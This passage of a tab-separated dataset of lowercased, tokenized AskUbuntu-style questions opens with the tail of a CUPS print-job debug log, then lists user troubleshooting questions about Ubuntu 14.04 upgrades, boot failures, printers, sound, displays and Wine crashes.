/ http/1.1 d [ 17/may/2014:12:09:09 -0400 ] cupsdsetbusystate : active clients , printing jobs , and dirty files d [ 17/may/2014:12:09:09 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:09 -0400 ] cupsdreadclient : 17 1.1 get-job-attributes 1 d [ 17/may/2014:12:09:09 -0400 ] get-job-attributes ipp : //localhost/jobs/291 d [ 17/may/2014:12:09:09 -0400 ] returning ipp successful-ok for get-job-attributes ( ipp : //localhost/jobs/291 ) from localhost d [ 17/may/2014:12:09:09 -0400 ] cupsdsetbusystate : printing jobs and dirty files d [ 17/may/2014:12:09:09 -0400 ] cupsdreadclient : 13 post / http/1.1 d [ 17/may/2014:12:09:09 -0400 ] cupsdsetbusystate : active clients , printing jobs , and dirty files d [ 17/may/2014:12:09:09 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:09 -0400 ] cupsdreadclient : 13 1.1 get-notifications 1 d [ 17/may/2014:12:09:09 -0400 ] get-notifications / d [ 17/may/2014:12:09:09 -0400 ] cupsdisauthorized : requesting-user-name= '' skittles '' d [ 17/may/2014:12:09:09 -0400 ] returning ipp successful-ok for get-notifications ( / ) from localhost d [ 17/may/2014:12:09:09 -0400 ] cupsdsetbusystate : printing jobs and dirty files d [ 17/may/2014:12:09:09 -0400 ] cupsdreadclient : 17 waiting closing on eof d [ 17/may/2014:12:09:09 -0400 ] cupsdcloseclient : 17 d [ 17/may/2014:12:09:10 -0400 ] pid 3172 ( /usr/lib/cups/filter/pstopdf ) exited with no errors . d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] filetype : pdf d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] storing temporary files in /var/spool/cups/tmp d [ 17/may/2014:12:09:10 -0400 ] pid 3173 ( /usr/lib/cups/filter/pdftopdf ) exited with no errors . d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] file contains 1 pages d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] starting renderer with command : gs -dfirstpage=1 -q -dbatch -dparanoidsafer -dquiet -dnopause -sdevice=bjc800 -dprintcolors=15 -dprocesscolormodel=/devicergb -dbitsperpixel=24 -sprintquality=draft -dmediaweight=80 -smediatype=plainpaper -dmanualfeed=true -ddevicewidthpoints=612 -ddeviceheightpoints=792 -r600x600 -soutputfile=- /var/spool/cups/tmp/foomatic-na1exp d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] starting process `` kid3 '' ( generation 1 ) d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] starting process `` kid4 '' ( generation 2 ) d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] starting process `` renderer '' ( generation 2 ) d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] jcl : % -12345x @ pjl d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] < job data > d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] renderer exited with status 255 d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] kid3 exit status : 3 d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] read 51 bytes of print data ... d [ 17/may/2014:12:09:10 -0400 ] pid 3174 ( /usr/lib/cups/filter/foomatic-rip ) stopped with status 9 ! d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] state : -media-empty-warning d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] state : -offline-report i [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] printer is now online . d [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] wrote 51 bytes of print data ... d [ 17/may/2014:12:09:10 -0400 ] cupsdmarkdirty ( -- -- -s ) d [ 17/may/2014:12:09:10 -0400 ] cupsdmarkdirty ( -- -- -s ) d [ 17/may/2014:12:09:10 -0400 ] pid 3175 ( /usr/lib/cups/backend/usb ) exited with no errors . d [ 17/may/2014:12:09:10 -0400 ] cupsdmarkdirty ( -- -- -s ) e [ 17/may/2014:12:09:10 -0400 ] [ job 291 ] job stopped due to filter errors ; please consult the error_log file for details . d [ 17/may/2014:12:09:10 -0400 ] cupsdmarkdirty ( -- -- j- ) d [ 17/may/2014:12:09:10 -0400 ] cupsdmarkdirty ( -- -- -s ) d [ 17/may/2014:12:09:10 -0400 ] cupsdacceptclient : 16 from localhost ( domain ) d [ 17/may/2014:12:09:10 -0400 ] cupsdreadclient : 16 post / http/1.1 d [ 17/may/2014:12:09:10 -0400 ] cupsdsetbusystate : active clients and dirty files d [ 17/may/2014:12:09:10 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:10 -0400 ] cupsdreadclient : 16 1.1 get-jobs 1 d [ 17/may/2014:12:09:10 -0400 ] get-jobs ipp : //localhost/printers/ d [ 17/may/2014:12:09:10 -0400 ] returning ipp successful-ok for get-jobs ( ipp : //localhost/printers/ ) from localhost d [ 17/may/2014:12:09:10 -0400 ] cupsdsetbusystate : dirty files d [ 17/may/2014:12:09:10 -0400 ] cupsdreadclient : 16 waiting closing on eof d [ 17/may/2014:12:09:10 -0400 ] cupsdcloseclient : 16 d [ 17/may/2014:12:09:10 -0400 ] cupsdacceptclient : 16 from localhost ( domain ) d [ 17/may/2014:12:09:10 -0400 ] cupsdreadclient : 16 post / http/1.1 d [ 17/may/2014:12:09:10 -0400 ] cupsdsetbusystate : active clients and dirty files d [ 17/may/2014:12:09:10 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:10 -0400 ] cupsdreadclient : 16 1.1 get-notifications 1 d [ 17/may/2014:12:09:10 -0400 ] get-notifications / d [ 17/may/2014:12:09:10 -0400 ] cupsdisauthorized : requesting-user-name= '' skittles '' d [ 17/may/2014:12:09:10 -0400 ] returning ipp successful-ok for get-notifications ( / ) from localhost d [ 17/may/2014:12:09:10 -0400 ] cupsdsetbusystate : dirty files d [ 17/may/2014:12:09:10 -0400 ] cupsdreadclient : 13 post / http/1.1 d [ 17/may/2014:12:09:10 -0400 ] cupsdsetbusystate : active clients and dirty files d [ 17/may/2014:12:09:10 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:10 -0400 ] cupsdreadclient : 13 1.1 get-notifications 1 d [ 17/may/2014:12:09:10 -0400 ] get-notifications / d [ 17/may/2014:12:09:10 -0400 ] cupsdisauthorized : requesting-user-name= '' skittles '' d [ 17/may/2014:12:09:10 -0400 ] returning ipp successful-ok for get-notifications ( / ) from localhost d [ 17/may/2014:12:09:10 -0400 ] cupsdsetbusystate : dirty files d [ 17/may/2014:12:09:10 -0400 ] cupsdacceptclient : 17 from localhost ( domain ) d [ 17/may/2014:12:09:10 -0400 ] cupsdreadclient : 15 waiting closing on eof d [ 17/may/2014:12:09:10 -0400 ] cupsdcloseclient : 15 d [ 17/may/2014:12:09:10 -0400 ] cupsdreadclient : 17 post / http/1.1 d [ 17/may/2014:12:09:10 -0400 ] cupsdsetbusystate : active clients and dirty files d [ 17/may/2014:12:09:10 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:10 -0400 ] cupsdreadclient : 17 1.1 get-printer-attributes 1 d [ 17/may/2014:12:09:10 -0400 ] get-printer-attributes ipp : //skittles-desktop:631/printers/canon-i455 d [ 17/may/2014:12:09:10 -0400 ] returning ipp successful-ok for get-printer-attributes ( ipp : //skittles-desktop:631/printers/canon-i455 ) from localhost d [ 17/may/2014:12:09:10 -0400 ] cupsdsetbusystate : dirty files d [ 17/may/2014:12:09:10 -0400 ] cupsdreadclient : 17 post / http/1.1 d [ 17/may/2014:12:09:10 -0400 ] cupsdsetbusystate : active clients and dirty files d [ 17/may/2014:12:09:10 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:10 -0400 ] cupsdreadclient : 17 1.1 get-job-attributes 1 d [ 17/may/2014:12:09:10 -0400 ] get-job-attributes ipp : //localhost/jobs/291 d [ 17/may/2014:12:09:10 -0400 ] returning ipp successful-ok for get-job-attributes ( ipp : //localhost/jobs/291 ) from localhost d [ 17/may/2014:12:09:10 -0400 ] cupsdsetbusystate : dirty files d [ 17/may/2014:12:09:10 -0400 ] cupsdreadclient : 16 waiting closing on eof d [ 17/may/2014:12:09:10 -0400 ] cupsdcloseclient : 16 d [ 17/may/2014:12:09:11 -0400 ] [ job 291 ] unloading ... d [ 17/may/2014:12:09:15 -0400 ] cupsdreadclient : 13 post / http/1.1 d [ 17/may/2014:12:09:15 -0400 ] cupsdsetbusystate : active clients and dirty files d [ 17/may/2014:12:09:15 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:15 -0400 ] cupsdreadclient : 13 1.1 get-job-attributes 1 d [ 17/may/2014:12:09:15 -0400 ] get-job-attributes ipp : //localhost/jobs/291 d [ 17/may/2014:12:09:15 -0400 ] [ job 291 ] loading attributes ... d [ 17/may/2014:12:09:15 -0400 ] returning ipp successful-ok for get-job-attributes ( ipp : //localhost/jobs/291 ) from localhost d [ 17/may/2014:12:09:15 -0400 ] cupsdsetbusystate : dirty files d [ 17/may/2014:12:09:15 -0400 ] cupsdreadclient : 13 post / http/1.1 d [ 17/may/2014:12:09:15 -0400 ] cupsdsetbusystate : active clients and dirty files d [ 17/may/2014:12:09:15 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:15 -0400 ] cupsdreadclient : 13 1.1 cancel-subscription 1 d [ 17/may/2014:12:09:15 -0400 ] cancel-subscription / d [ 17/may/2014:12:09:15 -0400 ] cupsdisauthorized : requesting-user-name= '' skittles '' d [ 17/may/2014:12:09:15 -0400 ] cupsdmarkdirty ( -- -- -s ) d [ 17/may/2014:12:09:15 -0400 ] returning ipp successful-ok for cancel-subscription ( / ) from localhost d [ 17/may/2014:12:09:15 -0400 ] cupsdsetbusystate : dirty files d [ 17/may/2014:12:09:15 -0400 ] cupsdacceptclient : 15 from localhost ( domain ) d [ 17/may/2014:12:09:15 -0400 ] cupsdreadclient : 15 get /admin/log/error_log http/1.1 d [ 17/may/2014:12:09:15 -0400 ] cupsdsetbusystate : active clients and dirty files d [ 17/may/2014:12:09:15 -0400 ] cupsdauthorize : no authentication data provided .
468320	ca n't boot after 14.04 upgrade	dual boot from 2 hard drives ( win7 , u13.10 ) . been running good for months ( year ? ) . auto upgraded to 14.04 over night . got up in the morning , and it wo n't boot into ubuntu . it says it ca n't find the root directory and systems on boot , and wo n't let me type any commands . i built a 14.04 usb stick , and running that right now . the stick is able to mount the target harddrive and i am able to recover the files that i have permission to access ( ? ) of folders i am allowed to see the contents . i 've been able to save my most essential files ( invoices , tax info , accounting , order tracker ) ; but some other random ones are not able to be copied over to the other harddrive . the stick is not able to install 14.04 to the desired hd because the root file system is not defined . it appears as one giant partition on the installer tool . i do n't know what to do to re-part while avoiding wiping out my files . so the question : how do i get it to install 14.04 , without losing my files ? thanks ! !
468322	ca n't download google chromium from software centre ?	so , after installing ubuntu yesterday , i wanted to install chrome . i found the chromium browser in the software centre . after clicking the install button , and typing my password , i get a message titled `` failed to download packages ''
468325	can not unlock system settings 14.04	i 've installed ubuntu 14.04 on my hp chromebook 14 using crouton . i 've gotten things setup and installed the programs i need . the time & date settings are using the wrong timezone though and when i go to system settings i ca n't change anything as it tells me to unlock first , all though i 'm an administrator and the button is unclickable . here is a pic of my screen ... http : //imgur.com/3pwj6a9 what do i need to do to change this ? -- - edit -- - i 'm adding this edit as i 've solved how to fix the incorrect date & time settings , but the question of how to unlock the system settings still remain . since this is setup on a chromebook using crouton many of the system operations are inherited/shared from chrome os . for instance none of your network connections are managed or shown in ubuntu . when i put my chromebook in developer mode it obviously resets these settings so i setup crouton/ubuntu and had forgotten to go back and change the time in chrome os to my time zone . when i realized this i logged out of ubuntu , changed the time zone to my time and then ran the startunity command again to start up ubuntu . the time is corrected now and that annoyance is gone . ultimately i 'm not sure why it seems to lock some of these settings , and maybe it 's only the ones inherited by chrome os , but nonetheless i halfway fixed the problem . i 'm leaving this question open though if anyone as anything to offer as far as the root of the problem ; locked system settings goes .
468326	some keys are not detected in my keyboard ( multimedia keys ? ) by either xev or xbindkeys or keytouch : how to detect them ?	it is one more attempt to get fn keys to volume up/down , brightness , etc . working . those controls are simply not working in my non-branded ultrabook . i want to detect them to modify /home/username/.config/openbox/lubuntu-rc.xml , as the following does n't seem working : < keybind key= '' xf86audioraisevolume '' > < action name= '' execute '' > < command > amixer -q sset master 3 % + unmute < /command > neither xev nor xbindkeys nor keytouch are detecting when i press volumen up or brightness down , for example . the start/stop touchpad button is working , but is not detected by those applications either . i also tried with dconf-editor as it is suggested here . next was already set to xf86audionext ( and it is active ) here , i read the following explanation : some laptop fn key combinations are multimedia keys ( appearing to the os as ordinary keys with nonstandard codes ) , while others trigger acpi events that eventually reach the os , and some are just handled by the bios and never seen by the os . the information paths are explained on the hotkeys/architecture page on the ubuntu wiki , complete with diagrams . if the os ca n't see anything when you press the brightness keys , it could be because they 're handled directly by the bios . the battle is not completely lost â it is in principle possible to hack the bios â but the difficulty level is considerably raised . any idea ?
468327	strange usb ( phone ) behavior	i have 12.04lts on a dell inspiron laptop , and it behaves very strangely when i plug my samsung galaxy sii phone into it . when i connect the phone , i get three dialog boxes , one says `` unable to mount samsung_androit ... error initializing camera : -60 could not lock device '' then the other two are the typical `` you have just inserted a digital audio player ... '' asking what to do ( there are two i think because there are effectively two sd cards in the phone , one `` built-in '' and one plugged into it . anyway , if i ask one of the dialogs to go to the files , i see two devices with the little eject icons beside them , a bunch of folders , and a couple of files . however , if i try to look inside anything , it appears empty ( not true , in case it needs saying ! ) also , if i run the mount command , that does n't show the device ( s ) anywhere , and if i use the command line to do `` cd /media ; ls -a '' the media location is empty . if i plug the same phone , with the same cable , onto another machine running ubuntu 13.10 , it works just fine . one device shows up , with two subfolders , and those folders ( representing the two sd cards in the phone ) all contain their regular data . it also shows up under mount and ls /media in the way i would expect . oh , one more thing . a regular memory stick works fine in that socket . any suggestions ? tia , simon
468334	how to move data to specific areas of an ssd ?	ubuntu on a crucial ssd , fantastic ! but will never use 120 gigs or even half that . after years of ssd writes ( and subsequent ssd corruption ) , does an utility exist to copy the entire operating system and all files over to the unused portion of the ssd ? my understanding is the ssd degrades in activity areas , where it is being used and written to . but at least half of the ssd never used , and will never be used , and so remains in new pristine condition . can the lifetime of the ssd be doubled by copying the first 60 gigs ( where ubuntu and everything resides ) over to the last never-used 60 gigs ? then those first 60 gigs would be erased , and set aside as a new partition . and ubuntu now runs on the equivalent of a new ssd , those last 60 gigs . the utility would then need to prevent any future usage or writes to that first 60 gig partition of the ssd where ubuntu had formerly resided .
468338	issue with multiple monitors ( one is detected as built in , the other is n't detected )	i 've just installed ubuntu 14.04 ( first time using it so i am pretty clueless ) and i ca n't get my two monitors to be detected . when i go to the settings it detects one of them but it is recognised as a built in display and it does n't let me toggle that off . sorry if this is a stupid question but i ca n't find an answer . thanks for any help in advance . my graphics card is a radeon 7870 hd tahitin edition . my displays are mirrored and set to the same resolution . when i installed ubuntu i had to set it to nomodeset , just in case that 's relevant . update : i found the solution but ca n't answer my own question ... '' i got it working ! i tried getting amd catalyst control centre using ( http : //www.thefanclub.co.za/how-to/ubuntu-amd-catalyst-install ) and after the reboot both screens were detected . mouse is a little buggy when going from one screen to another but the monitors are detected and at the correct resolution . ''
468342	no sound , printer , or wireless connections	had sound after installation but not now ; have not been able to connect to canon pixma ip2600 ; have not been able to connect wirelessly .
468343	unable to install vss6 in wine1.6 on ubuntu 14.04 64bit	after i click next on first screen it 's always shows up `` program error '' please help for image http : //imageshack.com/a/img843/8290/8v81.png and this error . unhandled exception : page fault on read access to 0x00000000 in 32-bit code ( 0x0040e449 ) . register dump : cs:0023 ss:002b ds:002b es:002b fs:0063 gs:006b eip:0040e449 esp:0033b8d8 ebp:00000000 eflags:00010216 ( r- -- i -a-p- ) eax:7bc4b629 ebx : ffffff31 ecx:0033c00c edx:00000000 esi:00000000 edi:0000004e stack dump : 0x0033b8d8 : 0000004e 0033c00c ffffff31 0040dce4 0x0033b8e8 : 0041f278 00010082 0040ec47 0033cfd0 0x0033b8f8 : 00010082 0033c7f8 7ea46000 00000001 0x0033b908 : 0033b928 00220024 0033c472 0033b9a8 0x0033b918 : 0033b948 f75938bb 4d430003 00000000 0x0033b928 : 00000000 00000000 00000000 00000000 000c : sel=0067 base=00000000 limit=00000000 32-bit r-x backtrace : = > 0 0x0040e449 in setup ( +0xe449 ) ( 0x00000000 ) 0x0040e449 : cmpb $ 0x0,0x0 ( % esi ) modules : module address debug info name ( 67 modules ) pe 400000- 486000 export setup elf 7ac00000-7ac5f000 deferred riched20 < elf > \-pe 7ac10000-7ac5f000 \ riched20 elf 7b800000-7ba5b000 deferred kernel32 < elf > \-pe 7b810000-7ba5b000 \ kernel32 elf 7bc00000-7bcdb000 deferred ntdll < elf > \-pe 7bc10000-7bcdb000 \ ntdll elf 7bf00000-7bf04000 deferred < wine-loader > elf 7dccc000-7de02000 deferred oleaut32 < elf > \-pe 7dce0000-7de02000 \ oleaut32 elf 7de02000-7de83000 deferred rpcrt4 < elf > \-pe 7de10000-7de83000 \ rpcrt4 elf 7de83000-7dfbf000 deferred ole32 < elf > \-pe 7dea0000-7dfbf000 \ ole32 elf 7e05a000-7e07f000 deferred imm32 < elf > \-pe 7e060000-7e07f000 \ imm32 elf 7e07f000-7e0b6000 deferred uxtheme < elf > \-pe 7e090000-7e0b6000 \ uxtheme elf 7e0b6000-7e0bc000 deferred libxfixes.so.3 elf 7e0bc000-7e0c7000 deferred libxcursor.so.1 elf 7e0c7000-7e0d8000 deferred libxi.so.6 elf 7e0d8000-7e0dc000 deferred libxcomposite.so.1 elf 7e0dc000-7e0e7000 deferred libxrandr.so.2 elf 7e0e7000-7e0f2000 deferred libxrender.so.1 elf 7e0f2000-7e0f8000 deferred libxxf86vm.so.1 elf 7e0f8000-7e0fc000 deferred libxinerama.so.1 elf 7e0fc000-7e103000 deferred libxdmcp.so.6 elf 7e103000-7e107000 deferred libxau.so.6 elf 7e107000-7e129000 deferred libxcb.so.1 elf 7e129000-7e25d000 deferred libx11.so.6 elf 7e25d000-7e270000 deferred libxext.so.6 elf 7e274000-7e288000 deferred riched32 < elf > \-pe 7e280000-7e288000 \ riched32 elf 7e28a000-7e31c000 deferred winex11 < elf > \-pe 7e290000-7e31c000 \ winex11 elf 7e391000-7e3ba000 deferred libexpat.so.1 elf 7e3ba000-7e3f5000 deferred libfontconfig.so.1 elf 7e3f5000-7e41d000 deferred libpng12.so.0 elf 7e41d000-7e437000 deferred libz.so.1 elf 7e437000-7e4d6000 deferred libfreetype.so.6 elf 7e4f0000-7e518000 deferred mpr < elf > \-pe 7e500000-7e518000 \ mpr elf 7e518000-7e592000 deferred shlwapi < elf > \-pe 7e530000-7e592000 \ shlwapi elf 7e592000-7e7c5000 deferred shell32 < elf > \-pe 7e5a0000-7e7c5000 \ shell32 elf 7e7c5000-7e837000 deferred advapi32 < elf > \-pe 7e7d0000-7e837000 \ advapi32 elf 7e837000-7e954000 deferred gdi32 < elf > \-pe 7e840000-7e954000 \ gdi32 elf 7e954000-7eaae000 deferred user32 < elf > \-pe 7e970000-7eaae000 \ user32 elf 7eaae000-7ebb5000 deferred comctl32 < elf > \-pe 7eac0000-7ebb5000 \ comctl32 elf 7ebb5000-7ebc2000 deferred libnss_files.so.2 elf 7ebc2000-7ebce000 deferred libnss_nis.so.2 elf 7ebce000-7ebe7000 deferred libnsl.so.1 elf 7ebe7000-7ebf0000 deferred libnss_compat.so.2 elf 7efa0000-7efe6000 deferred libm.so.6 elf 7efe6000-7f000000 deferred version < elf > \-pe 7eff0000-7f000000 \ version elf f739e000-f754d000 deferred libc.so.6 elf f754d000-f7552000 deferred libdl.so.2 elf f7553000-f756f000 deferred libpthread.so.0 elf f7589000-f773e000 dwarf libwine.so.1 elf f7740000-f7762000 deferred ld-linux.so.2 elf f7762000-f7763000 deferred [ vdso ] .so threads : process tid prio ( all id : s are in hex ) 0000000e services.exe 00000027 0 00000020 0 0000001a 0 00000018 0 00000016 0 00000010 0 0000000f 0 00000012 winedevice.exe 0000001f 0 0000001b 0 00000019 0 00000013 0 00000014 explorer.exe 0000001e 0 00000015 0 0000001c plugplay.exe 00000023 0 00000022 0 0000001d 0 00000024 ( d ) c : \sourcesafe\vss60c\setup.exe 00000025 0 < == system information : wine build : wine-1.6.2 platform : i386 host system : linux host version : 3.13.0-24-generic
468345	ubuntu willl not boot after update	i tried turning on my laptop , but i keep receiving this screen . i 'm not sure how to fix this . if i boot into recovery mode in a lower version it works , but not well . it becomes very glitchy , and i ca n't move the mouse . it hangs on the same screen as well .
468349	how to enable webgl in chrome	i am unable to visualise many 3d graphics of different applications [ ex : -biodigital human 3d of chrome store ] and many more 3d games and graphics i am current using gallium 0.4 on amd rs780 as my graphic card and do not know whether it is functioning or not in ubuntu but in windows 7 it works so can any body suggest stepwise settings or sequence of commands to get it fixed this screenshot shows a 3d app which is been supported in windows 7 installed through virtuaal box but the same thing i am unable to get it done in ubuntu and this is shown when i type the command in terminal to know about my graphics card *edit
468351	steam ubuntu 14.04 libgl.so.1 bumblebee	i 'm trying to install steam on ubuntu 14.04 but i 'm missing a library you are missing the following 32-bit libraries , and steam may not run : libgl.so.1 i have installed libgl1-mesa-glx : i386 but it still does n't work using the nvidia card with bumblebee ( optirun ) it starts normally , thus i do n't know what this could be . i have also ubuntu 13.04 and i can start steam with the intel card without any problems , and use optirun only when launching the games
468352	error : attempt to read or write outside of disk 'hd0 '	i have try every solution , but my cpu refuse to respond to any comand.i have a ubuntu 13.10 op system .
468355	errors were encountered while processing	when trying to do sudo apt-get install i 'm getting this at the end : processing triggers for python-central ... errors were encountered while processing : logmein-client : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how do i get rid of this error .
468357	ubuntu portable virtualbox	i 'm wondering about this : i have a ubuntu vm installed on my computer and i love it ! my issue is when i try to start portable virtualbox on another computer ( it 's on my thumb drive ) it crashes . i 'm curious if there 's a workaround for this ? thanks !
468359	installing atom text editor on 32-bit ubuntu 13.10 ?	the atom editor newly introduced by the github team , looks like `` a hackable text editor for the 21st century '' , and i must say , the screenshots have lured me . official binaries are only available for os x . after going open-source many have created their own binaries , and some even added them to repos . but when reading a tutorial on installation i read this : currently , atom only works on 64bit ( on linux ) so if you use ubuntu 32-bit , you ca n't install it by using this ppa and not even by compiling it by yourself . so is there anyway to install it ? maybe 64-bit emulation or something ? thanks for your time !
468367	detect if a mouse button is held down and execute a command	is there a way to detect if a mouse button is held down and execute a command depending on the result ?
468369	reinstall 14.04 fails to recognise separate /home . can i recover old home ?	previous working system : upgrade of 13.10 to 14.04 with /home on separate partition . this worked fine after i removed my second graphic board . reinstall after some weeks i decided to do a fresh install but chickened out when i saw the option to reinstall keeping documents , music etc . so i chose reinstall . this worked but left me with a new /home directory . the old /home directory is present on another partition . how can i set up so this is recognised ?
468370	how to search in dash files that are n't in default places	i have some custom folders in /home , and i would like them to be included in file search with the dash . subfolders , however , show up . there are some answers in askubuntu regarding some close related questions ( here or here , for instance ) , but they are rather old , not valid to 14.04 . so the thing is : how can i customize which folders is the dash searching ?
468371	my ethernet is not been detected in ubuntu 14.04 64bit	my eth0 has been detected and i can see the mac id of my gigabit lan chip . it for some reason is n't connecting to the internet . it works just fine when i run windows on it . i 'm on a gigabyte 990fxa-ud3 rev.4 motherboard which uses a realtek glan chip . please help !
468373	touchpad wo n't respond immediately	this is more of a pet-peeve item , but i recently updated from ubuntu 13.10 to ubuntu 14.04 , and it looks great , but my touchpad is a bit `` sticky '' . it does n't move right away , and i have to drag it a little before i get a response . i have a dell inspiron n5110 . any tips ? it worked just fine in 13.10 .
468374	how to enable some functionality from newer kernel in older kernel in xubuntu 14.04 ?	how ( if it is possible ) can i enable some functionality that is working in kernel 3.13.0-27 in kernel 3.11.0-20 . in newer version of kernel multifinger scrolling on my touch pad is working , but in my older not . because of a bug i must use older version .
468375	tinny sound on lenovo u510	i want to ask , how can i tweak my sounds from speakers . it now sounds so tinny , like the sound comes from a tin can . in windows , i do n't have any problems with it , but in ubuntu it sounds just awful . in search of a solution , i spent approximately six hours . i tried to reinstall the alsa drivers , tweak settings in alsamixer and i also try to restart pulseaudio . nothing worked for me . the off sound can be heard when someone in the track ( sound ) speaks a bit louder . when someone speaks normal , it 's little bit better , and when i lower the volume it sounds even less tinny , but it can still be heard . do you have any tips ? i 'm having this issue on a lenovo ideapad u510 with intel core i3 . i am running ubuntu 14.04. lspci : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 02:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 ) and information from alsa-info.sh is located here : http : //www.alsa-project.org/db/ ? f=907d60a47fd8c280bc33db9997d83a196dca96eb
468376	will my data be erased when i upgrade from saucy salamander to trusty tahr ?	i want to upgrade but i´m afraid that all my data will be erased , and i cant make a data backup because i don´t have the needed hardware .
468377	notepad does n't open files created by gedit ?	i 'm using c/c++ compiler on ubuntu 14.04 and i 've typed all the programs using gedit text editor . but the problem is that now i need to open them in windows 8 with notepad , but when i tried to open .c files that are created in ubuntu in notepad they are displaying like a paragraph but not line by line . so i need the programs to be displayed line by line as in gedit . the only method i found was to edit each and every line in the program as to be displayed as line by line .
468384	weird data printing when using star tsp800	i have a star tsp 800 printer . i have hooked it up with a parallel to usb cable to my macbook pro running ubuntu in vmware . when i try to print to this printer i get a really weird print out . it starts with some document info such as : % % title ( test page ) % % for ( robert ) % % rbinumcopies ( 1 ) it then goes into : /pdfstartpage { pdfdictsize dict begin /pdf color set i am just test printing the word `` test '' from a word application . i have no idea where to start debugging . can anyone help ?
468386	holding super key does n't show unity shortcuts in 14.04 ?	when i hold down the superkey the list of keyboard shortcuts no longer appears ? how do i enable again ?
468387	how should i package my sources so launchpad build my package for all versions of ubuntu ?	i have a package that should build for all versions of ubuntu , so i hope that launchpad builds all of them ... well , it does n't . i submitted just using trusty in the changelog release field , and launchpad build it for trusty . i changed it for precise and just built for precise . is there a way i can use the same sources for several release target ? ffc ( 1.3.20140513-1 ) trusty ; urgency=medium * non-maintainer upload . * moving to git . * syncronized debian/* with upstream -- redacted < redacted @ example.com > fri , 16 may 2014 16:15:00 -0400
468388	ubuntu 14.04 screen freezes randomly	im using ubuntu 14.04 and screen often freezes randomly . hardware : ram : 5,7 gb processor : intel® core™ i5-3210m cpu @ 2.50ghz × 4 graphics card : geforce 610m/pcie/sse2 disc space : 730 gb i installed drivers too . how can i fix it ?
468390	fadecut wo n't save files	i can not get fadecut to save the music files it is supposedly generating . the terminal is full of lines saying 21:09:36 success : /usr/bin/streamripper started pid=11485 ( of course with different timestamps and pid 's ) but no new file anywhere . i have ubuntu 14.04 . any cue ? lots of thanks .
468392	keyboard not working after reboot	i have ubuntu 13.10 ( i think , i 'm not sure ) installed on my computer . i was browsing the web and i wanted to restart the pc . i pressed the restart button in ubuntu . when the computer turned on the keyboard was not working at all ( my computer starts with grub but without automatic boot ) . i was n't able even to enter the bios . i tried other keyboard but it did n't work . by the way , i have a ps/2 keyboard . the other keyboard i tested was also ps/2 . i tried to enter an bootable cd but it did n't work .
468393	no dropbox indicator icon in `` gnome with xmonad '' session	i 'm using ubuntu 's `` gnome with xmonad '' session . after switching from 13.10 to 14.04 , there was no dropbox indicator icon in that session , although dropbox was working fine and the icon appeared in other sessions .
468398	how do i boot into windows ?	i installed ubuntu 14.04 in my pc . i tried to install it alongside my windows 7 . i have a total of 500gb hard disk and i separated 25 gb for ubuntu . now , i can not access my windows and every time i restart i can access only ubuntu . i am in a serious problem and need to reach my windows 7 as my research work is in windows 7. can anyone help me recovery my win 7. its urgent
468400	install ubuntu in a virtualbox vm on ubuntu host through cli ( ssh ) only ?	i just installed a new remote server with ubuntu 14.04 , added an ssh server so i can control the server remotely through ssh . no gui involved . well , the server has a gui , but i have no physical access to it . i also installed virtualbox ( using `` sudo apt-get install virtualbox '' ) and now i want to create a virtualbox vm , and install ubuntu in there as well . is it possible to do this entirely through ssh only ? or would i need some visual/graphical interface to the vm ( and thus , also to the host machine ) as well ?
468401	gconf-editor , where disappear '/apps/matacity/general ' location ?	is there anyone who knows where is /apps/metacity/general location in gconf-editor ? i am looking for reduced_resources .
